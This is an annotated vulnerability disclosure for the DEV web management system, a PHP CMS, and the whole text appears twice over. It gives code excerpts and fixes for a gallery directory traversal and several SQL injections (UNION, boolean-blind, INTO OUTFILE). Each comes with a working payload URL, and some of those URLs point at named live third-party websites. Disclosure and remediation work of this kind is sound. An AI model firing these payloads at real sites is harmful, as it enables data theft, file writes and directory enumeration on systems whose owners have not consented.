AFoST
16.10.2009, 00:14
Product: DEV web management system (dev-wms.sourceforge.net/). The affected version is not stated in the post. In every excerpt below the request parameters ($ct, $article, $id, $autor, $login) are used as plain variables with no visible read of $_GET/$_POST, which suggests the application relies on register_globals or an equivalent extract — that code is not shown here. None of the values is validated, cast or escaped before reaching OpenDir() or mysql_query().
========================
Directory traversal / arbitrary directory listing
$ct is appended to $configuration->gallery_folder_url with no normalisation and no check that the result stays inside the gallery folder; the `if ($ct)` guard only rejects an empty value. `../` sequences therefore walk out of the gallery directory and the ReadDir loop enumerates whatever directory the path resolves to. Fix: reject any $ct containing `..` or a path separator, or resolve the path with realpath() and require the gallery folder as its prefix.
gallery.php
...
if ($ct) {
$dp=OpenDir ("$configuration->gallery_folder_url$ct/");
$i=0;
$configuration->thumbnail_spacing=floor($configuration->thumbnail_spacing/2);
while ($fname=ReadDir($dp)) {
...
http://dev/index.php?session=0&action=gallery&page=1&ct=wallpapers/../../
example: http://www.hornatorysa.com/index.php?session=0&action=gallery&page=1&ct=/../../../../../www/hornatorysa.com/public_html/
(The "example" URLs in this post point at live third-party sites quoted by the original author; do not test them without the owner's authorisation.)
===========================
SQL injection — determ_title.php (page-title lookup)
$article is interpolated raw and unquoted into `WHERE id=$article` in both the read and komentar cases; the `@` only hides the MySQL error message, it does not stop the query from running. Because this file is what computes $pagetitle, its komentar case appears to be the query that the numeric article= payloads on the komentar action actually hit (see the komentar.php entries below) — inferred from the visible cases, the include is not shown. Fix: `WHERE id=".(int)$article` or a prepared statement.
...
switch ($action) {
case "register";
$pagetitle="$configuration->site_name :: $language[AUTHOR_REGISTRATION]";
break;
case "add";
$pagetitle="$configuration->site_name :: $language[ADD_ARTICLE_INTO_SYSTEM]";
break;
case "read";
@$titlpart=mysql_fetch_array(mysql_query("SELECT nazov FROM prispevok1 WHERE id=$article"));
$pagetitle="$configuration->site_name :: $titlpart[nazov]";
break;
case "komentar";
@$titlpart=mysql_fetch_array(mysql_query("SELECT nazov FROM prispevok1 WHERE id=$article"));
$pagetitle="$configuration->site_name :: $titlpart[nazov] - $language[COMMENTS]";
break;
...
http://dev/?action=read&article=1+union+select+concat(name,0x3a,value%20)+ from+variables1+limit+2,1+--%20-
example: http://2pure.net/?action=read&article=1+union+select+concat(name,0x3a,value%20)+ from+variables1+limit+2,1+--%20-
=========================
SQL injection — komentar.php (comment listing)
Both queries place $article inside a quoted LIKE literal without escaping, so a value containing a single quote breaks out when magic_quotes_gpc is off. Note that the numeric payload in the URL below contains no quote and so stays inside the literal here; what makes that URL work is most plausibly the unquoted `WHERE id=$article` in determ_title.php's komentar case. $page only enters the LIMIT clause through arithmetic and cannot carry SQL. Fix: mysql_real_escape_string() / a prepared statement, and `=` rather than LIKE so `%` and `_` in the value cannot match other articles.
...
// Builds the paged comment listing for one article. $article and $page are not read
// from $_GET here — presumably register_globals; confirm in the elided code.
// $article lands inside a quoted LIKE literal with no escaping: a value containing a
// single quote breaks out (when magic_quotes_gpc is off). The numeric UNION payload in
// the URL below has no quote, so it stays inside this literal; that URL most plausibly
// fires through the unquoted `WHERE id=$article` in determ_title.php's komentar case.
// $page only reaches LIMIT through arithmetic, so it cannot carry SQL.
// Remediation: $article = mysql_real_escape_string($article, $spojenie); (or a prepared
// statement), $page = max(1, (int)$page); and `article = ...` instead of LIKE so that
// `%`/`_` in the value cannot match other articles.
$prikaz="SELECT * FROM komentar1 WHERE article LIKE '".$article."' ORDER BY id DESC LIMIT ".($page-1)*$configuration->comments_boards_entries.",".$configuration->comments_boards_entries;
// Same unescaped $article in the count query that drives paging.
$total=mysql_fetch_row(mysql_query("SELECT count(id) FROM komentar1 WHERE article LIKE '$article'",$spojenie));
$vysledok=mysql_query ($prikaz,$spojenie);
...
http://dev/index.php?session=0&action=komentar&article=2+union+select+concat(name,0x3a,value%20)+ from+variables1+limit+2,1+/*
========================
SQL injection — readtp.php (topic view)
$id is concatenated unquoted with no cast or escaping, so anything after the number is executed as SQL. The UNION in the URL below selects five values, which implies topic1 has five columns (a UNION must match `SELECT *`). Fix: `WHERE id=".(int)$id` or a prepared statement.
...
// Loads one topic row by id. $id is interpolated raw and unquoted — no cast, no
// escaping — so any SQL following the number runs. The UNION in the URL below supplies
// five values, which implies topic1 has five columns. $id is not read from $_GET here;
// presumably register_globals — confirm.
// Remediation: $prikaz="SELECT * FROM topic1 WHERE id=".(int)$id; or a prepared statement.
$prikaz="SELECT * FROM topic1 WHERE id=$id";
$vysledok=mysql_query ($prikaz,$spojenie);
$zaznam=mysql_fetch_array ($vysledok);
...
http://dev/index.php?action=readtp&id=1+union+select+1,concat(name,0x3a,value%20),3,4 ,5+from+variables1+limit+2,1+--%20-
==========================
SQL injection, out-of-band via INTO OUTFILE (labelled "blind" in the original because nothing is echoed) — komentar.php (author lookup)
$autor goes into a quoted LIKE literal unescaped; the leading `'` in `autor=-1'` closes the literal and the rest is a UNION ... INTO OUTFILE. That write only succeeds when the DB account holds the FILE privilege, lands on the database server's filesystem (not necessarily the web host), and fails if the file already exists. The URL leaves article= empty, so determ_title.php's komentar case runs `WHERE id=` — a syntax error silenced by the `@`. Fix: mysql_real_escape_string() or a prepared statement, and `=` instead of LIKE so a nickname containing `%`/`_` cannot match other authors.
...
// Checks whether an author with this nickname exists before a comment is stored.
// $autor sits in a quoted LIKE literal with no escaping: a leading single quote (as in
// the URL below) closes the literal and the remainder runs as SQL. The INTO OUTFILE in
// that payload needs the FILE privilege and writes on the database host. Remediation:
// mysql_real_escape_string($autor, $spojenie) or a prepared statement, and `nickname = ?`
// rather than LIKE so `%`/`_` in a nickname cannot match other authors.
$enteredexist=mysql_fetch_array(mysql_query ("SELECT id FROM autor1 WHERE nickname like '$autor'", $spojenie));
...
http://dev/index.php?session=0&action=komentar&article=&autor=-1'+union+select+1+into+outfile+'c:/1.txt'+--%20-
==========================
SQL injection (out-of-band via INTO OUTFILE) — komentar.php (article-exists check when posting a comment)
$article is unquoted in the `elseif` query below. Note, however, that the `elseif` belongs to the `if` that requires $autor, $nazov and $komentar to be non-empty, and the URL below sends none of them — so, as excerpted, that request would take the first branch and never reach this query; the injection it triggers is more plausibly determ_title.php's komentar case. To exercise this query, non-empty autor, nazov and komentar parameters must be supplied as well (the elided lines may change this). Fix: `WHERE id=".(int)$article` or a prepared statement.
...
if ($spravit=="pridat") {
if ($autor=="" || $nazov=="" || $komentar =="") {
...
elseif (!mysql_fetch_array(mysql_query("SELECT id FROM prispevok1 WHERE id=$article",$spojenie))) {
echo ("<b><center>FATAL ERROR: ARTICLE NOT FOUND</center></b><br/><br/>");
}
...
http://dev/index.php?session=0&action=komentar&spravit=pridat&article=1+union+select+1+into+outfile+'c:/2.txt'+/*
=========================
Boolean-based blind SQL injection — read.php (article rating lookup)
$article is concatenated unquoted with no cast or escaping. The first URL below makes the row appear or vanish depending on whether the guessed digit of version() is correct — repeated per character, this extracts data without any direct output. The second URL UNIONs five values (matching the five selected columns) INTO OUTFILE, which needs the FILE privilege and writes on the database host. Fix: `WHERE id=".(int)$article` or a prepared statement.
...
// Fetches the vote/rating columns of the article being read. $article is concatenated
// raw and unquoted — no cast, no escaping. The first URL below is a boolean test on a
// digit of version() (row present or not); the second UNIONs five values, matching the
// five selected columns, INTO OUTFILE (needs the FILE privilege; written on the DB host).
// Remediation: $prikaz="SELECT hlasovalo, vysledok, znamka, id, autorid FROM prispevok1 WHERE id=".(int)$article;
// or a prepared statement.
$prikaz="SELECT hlasovalo, vysledok, znamka, id, autorid FROM prispevok1 WHERE id=".$article;
$xvysledok=mysql_query ($prikaz,$spojenie);
$xzaznam=mysql_fetch_array ($xvysledok);
...
http://dev/index.php?action=read&article=-1+or+5=(select+substring(version(),1,1))+--%20--
http://dev/index.php?action=read&article=-1+and+1=0+union+select+1,2,3,4,5+into+outfile+'c:/1.txt'--%20--
=========================
Boolean-based blind SQL injection — send.php (same rating query as read.php)
Identical query and identical defect: $article concatenated unquoted and unescaped. Same fix: `WHERE id=".(int)$article` or a prepared statement; ideally both files should call one shared, parameterised lookup.
...
// Same rating lookup as in read.php, with the same defect: $article is concatenated raw
// and unquoted, so the boolean payload in the URL below (`-1 or 5=(...)`) toggles whether
// a row comes back. Remediation: cast with (int)$article, or use a prepared statement —
// preferably via one shared helper so read.php and send.php cannot drift apart.
$prikaz="SELECT hlasovalo, vysledok, znamka, id, autorid FROM prispevok1 WHERE id=".$article;
$xvysledok=mysql_query ($prikaz,$spojenie);
...
http://dev/index.php?action=send&article=-1+or+5=(select+substring(version(),1,1))+--%20--
=========================
Boolean-based blind SQL injection — fpasswd.php (forgot-password lookup)
$login is only trimmed and then placed into a quoted LIKE literal; the leading `'` in the URL below closes it. The query selects the nickname, mail and heslo columns, so what the elided code does with $zaznam decides the impact. Separately from the injection, LIKE lets a plain `%` in login match the first author, which may let the recovery flow be triggered for an account the caller does not name — depending on the elided code. Fix: mysql_real_escape_string() or a prepared statement, and `nickname = ?` instead of LIKE.
...
if ($odoslane=="true" && $login!="") {
$login=trim ($login);
$prikaz="SELECT nickname, mail, heslo FROM autor1 WHERE nickname LIKE '".$login."'";
$vysledok=mysql_query($prikaz,$spojenie);
$zaznam=mysql_fetch_array($vysledok);
...
http://dev/index.php?action=forgot&odoslane=true&login='+or+5=(select+substring(version(),1,1))--%20-
========================
Directory traversal / arbitrary directory listing
$ct is appended to $configuration->gallery_folder_url with no normalisation and no check that the result stays inside the gallery folder; the `if ($ct)` guard only rejects an empty value. `../` sequences therefore walk out of the gallery directory and the ReadDir loop enumerates whatever directory the path resolves to. Fix: reject any $ct containing `..` or a path separator, or resolve the path with realpath() and require the gallery folder as its prefix.
gallery.php
...
if ($ct) {
$dp=OpenDir ("$configuration->gallery_folder_url$ct/");
$i=0;
$configuration->thumbnail_spacing=floor($configuration->thumbnail_spacing/2);
while ($fname=ReadDir($dp)) {
...
http://dev/index.php?session=0&action=gallery&page=1&ct=wallpapers/../../
example: http://www.hornatorysa.com/index.php?session=0&action=gallery&page=1&ct=/../../../../../www/hornatorysa.com/public_html/
(The "example" URLs in this post point at live third-party sites quoted by the original author; do not test them without the owner's authorisation.)
===========================
SQL injection — determ_title.php (page-title lookup)
$article is interpolated raw and unquoted into `WHERE id=$article` in both the read and komentar cases; the `@` only hides the MySQL error message, it does not stop the query from running. Because this file is what computes $pagetitle, its komentar case appears to be the query that the numeric article= payloads on the komentar action actually hit (see the komentar.php entries below) — inferred from the visible cases, the include is not shown. Fix: `WHERE id=".(int)$article` or a prepared statement.
...
switch ($action) {
case "register";
$pagetitle="$configuration->site_name :: $language[AUTHOR_REGISTRATION]";
break;
case "add";
$pagetitle="$configuration->site_name :: $language[ADD_ARTICLE_INTO_SYSTEM]";
break;
case "read";
@$titlpart=mysql_fetch_array(mysql_query("SELECT nazov FROM prispevok1 WHERE id=$article"));
$pagetitle="$configuration->site_name :: $titlpart[nazov]";
break;
case "komentar";
@$titlpart=mysql_fetch_array(mysql_query("SELECT nazov FROM prispevok1 WHERE id=$article"));
$pagetitle="$configuration->site_name :: $titlpart[nazov] - $language[COMMENTS]";
break;
...
http://dev/?action=read&article=1+union+select+concat(name,0x3a,value%20)+ from+variables1+limit+2,1+--%20-
example: http://2pure.net/?action=read&article=1+union+select+concat(name,0x3a,value%20)+ from+variables1+limit+2,1+--%20-
=========================
SQL injection — komentar.php (comment listing)
Both queries place $article inside a quoted LIKE literal without escaping, so a value containing a single quote breaks out when magic_quotes_gpc is off. Note that the numeric payload in the URL below contains no quote and so stays inside the literal here; what makes that URL work is most plausibly the unquoted `WHERE id=$article` in determ_title.php's komentar case. $page only enters the LIMIT clause through arithmetic and cannot carry SQL. Fix: mysql_real_escape_string() / a prepared statement, and `=` rather than LIKE so `%` and `_` in the value cannot match other articles.
...
// Builds the paged comment listing for one article. $article and $page are not read
// from $_GET here — presumably register_globals; confirm in the elided code.
// $article lands inside a quoted LIKE literal with no escaping: a value containing a
// single quote breaks out (when magic_quotes_gpc is off). The numeric UNION payload in
// the URL below has no quote, so it stays inside this literal; that URL most plausibly
// fires through the unquoted `WHERE id=$article` in determ_title.php's komentar case.
// $page only reaches LIMIT through arithmetic, so it cannot carry SQL.
// Remediation: $article = mysql_real_escape_string($article, $spojenie); (or a prepared
// statement), $page = max(1, (int)$page); and `article = ...` instead of LIKE so that
// `%`/`_` in the value cannot match other articles.
$prikaz="SELECT * FROM komentar1 WHERE article LIKE '".$article."' ORDER BY id DESC LIMIT ".($page-1)*$configuration->comments_boards_entries.",".$configuration->comments_boards_entries;
// Same unescaped $article in the count query that drives paging.
$total=mysql_fetch_row(mysql_query("SELECT count(id) FROM komentar1 WHERE article LIKE '$article'",$spojenie));
$vysledok=mysql_query ($prikaz,$spojenie);
...
http://dev/index.php?session=0&action=komentar&article=2+union+select+concat(name,0x3a,value%20)+ from+variables1+limit+2,1+/*
========================
SQL injection — readtp.php (topic view)
$id is concatenated unquoted with no cast or escaping, so anything after the number is executed as SQL. The UNION in the URL below selects five values, which implies topic1 has five columns (a UNION must match `SELECT *`). Fix: `WHERE id=".(int)$id` or a prepared statement.
...
// Loads one topic row by id. $id is interpolated raw and unquoted — no cast, no
// escaping — so any SQL following the number runs. The UNION in the URL below supplies
// five values, which implies topic1 has five columns. $id is not read from $_GET here;
// presumably register_globals — confirm.
// Remediation: $prikaz="SELECT * FROM topic1 WHERE id=".(int)$id; or a prepared statement.
$prikaz="SELECT * FROM topic1 WHERE id=$id";
$vysledok=mysql_query ($prikaz,$spojenie);
$zaznam=mysql_fetch_array ($vysledok);
...
http://dev/index.php?action=readtp&id=1+union+select+1,concat(name,0x3a,value%20),3,4 ,5+from+variables1+limit+2,1+--%20-
==========================
SQL injection, out-of-band via INTO OUTFILE (labelled "blind" in the original because nothing is echoed) — komentar.php (author lookup)
$autor goes into a quoted LIKE literal unescaped; the leading `'` in `autor=-1'` closes the literal and the rest is a UNION ... INTO OUTFILE. That write only succeeds when the DB account holds the FILE privilege, lands on the database server's filesystem (not necessarily the web host), and fails if the file already exists. The URL leaves article= empty, so determ_title.php's komentar case runs `WHERE id=` — a syntax error silenced by the `@`. Fix: mysql_real_escape_string() or a prepared statement, and `=` instead of LIKE so a nickname containing `%`/`_` cannot match other authors.
...
// Checks whether an author with this nickname exists before a comment is stored.
// $autor sits in a quoted LIKE literal with no escaping: a leading single quote (as in
// the URL below) closes the literal and the remainder runs as SQL. The INTO OUTFILE in
// that payload needs the FILE privilege and writes on the database host. Remediation:
// mysql_real_escape_string($autor, $spojenie) or a prepared statement, and `nickname = ?`
// rather than LIKE so `%`/`_` in a nickname cannot match other authors.
$enteredexist=mysql_fetch_array(mysql_query ("SELECT id FROM autor1 WHERE nickname like '$autor'", $spojenie));
...
http://dev/index.php?session=0&action=komentar&article=&autor=-1'+union+select+1+into+outfile+'c:/1.txt'+--%20-
==========================
SQL injection (out-of-band via INTO OUTFILE) — komentar.php (article-exists check when posting a comment)
$article is unquoted in the `elseif` query below. Note, however, that the `elseif` belongs to the `if` that requires $autor, $nazov and $komentar to be non-empty, and the URL below sends none of them — so, as excerpted, that request would take the first branch and never reach this query; the injection it triggers is more plausibly determ_title.php's komentar case. To exercise this query, non-empty autor, nazov and komentar parameters must be supplied as well (the elided lines may change this). Fix: `WHERE id=".(int)$article` or a prepared statement.
...
if ($spravit=="pridat") {
if ($autor=="" || $nazov=="" || $komentar =="") {
...
elseif (!mysql_fetch_array(mysql_query("SELECT id FROM prispevok1 WHERE id=$article",$spojenie))) {
echo ("<b><center>FATAL ERROR: ARTICLE NOT FOUND</center></b><br/><br/>");
}
...
http://dev/index.php?session=0&action=komentar&spravit=pridat&article=1+union+select+1+into+outfile+'c:/2.txt'+/*
=========================
Boolean-based blind SQL injection — read.php (article rating lookup)
$article is concatenated unquoted with no cast or escaping. The first URL below makes the row appear or vanish depending on whether the guessed digit of version() is correct — repeated per character, this extracts data without any direct output. The second URL UNIONs five values (matching the five selected columns) INTO OUTFILE, which needs the FILE privilege and writes on the database host. Fix: `WHERE id=".(int)$article` or a prepared statement.
...
// Fetches the vote/rating columns of the article being read. $article is concatenated
// raw and unquoted — no cast, no escaping. The first URL below is a boolean test on a
// digit of version() (row present or not); the second UNIONs five values, matching the
// five selected columns, INTO OUTFILE (needs the FILE privilege; written on the DB host).
// Remediation: $prikaz="SELECT hlasovalo, vysledok, znamka, id, autorid FROM prispevok1 WHERE id=".(int)$article;
// or a prepared statement.
$prikaz="SELECT hlasovalo, vysledok, znamka, id, autorid FROM prispevok1 WHERE id=".$article;
$xvysledok=mysql_query ($prikaz,$spojenie);
$xzaznam=mysql_fetch_array ($xvysledok);
...
http://dev/index.php?action=read&article=-1+or+5=(select+substring(version(),1,1))+--%20--
http://dev/index.php?action=read&article=-1+and+1=0+union+select+1,2,3,4,5+into+outfile+'c:/1.txt'--%20--
=========================
Boolean-based blind SQL injection — send.php (same rating query as read.php)
Identical query and identical defect: $article concatenated unquoted and unescaped. Same fix: `WHERE id=".(int)$article` or a prepared statement; ideally both files should call one shared, parameterised lookup.
...
// Same rating lookup as in read.php, with the same defect: $article is concatenated raw
// and unquoted, so the boolean payload in the URL below (`-1 or 5=(...)`) toggles whether
// a row comes back. Remediation: cast with (int)$article, or use a prepared statement —
// preferably via one shared helper so read.php and send.php cannot drift apart.
$prikaz="SELECT hlasovalo, vysledok, znamka, id, autorid FROM prispevok1 WHERE id=".$article;
$xvysledok=mysql_query ($prikaz,$spojenie);
...
http://dev/index.php?action=send&article=-1+or+5=(select+substring(version(),1,1))+--%20--
=========================
Boolean-based blind SQL injection — fpasswd.php (forgot-password lookup)
$login is only trimmed and then placed into a quoted LIKE literal; the leading `'` in the URL below closes it. The query selects the nickname, mail and heslo columns, so what the elided code does with $zaznam decides the impact. Separately from the injection, LIKE lets a plain `%` in login match the first author, which may let the recovery flow be triggered for an account the caller does not name — depending on the elided code. Fix: mysql_real_escape_string() or a prepared statement, and `nickname = ?` instead of LIKE.
...
if ($odoslane=="true" && $login!="") {
$login=trim ($login);
$prikaz="SELECT nickname, mail, heslo FROM autor1 WHERE nickname LIKE '".$login."'";
$vysledok=mysql_query($prikaz,$spojenie);
$zaznam=mysql_fetch_array($vysledok);
...
http://dev/index.php?action=forgot&odoslane=true&login='+or+5=(select+substring(version(),1,1))--%20-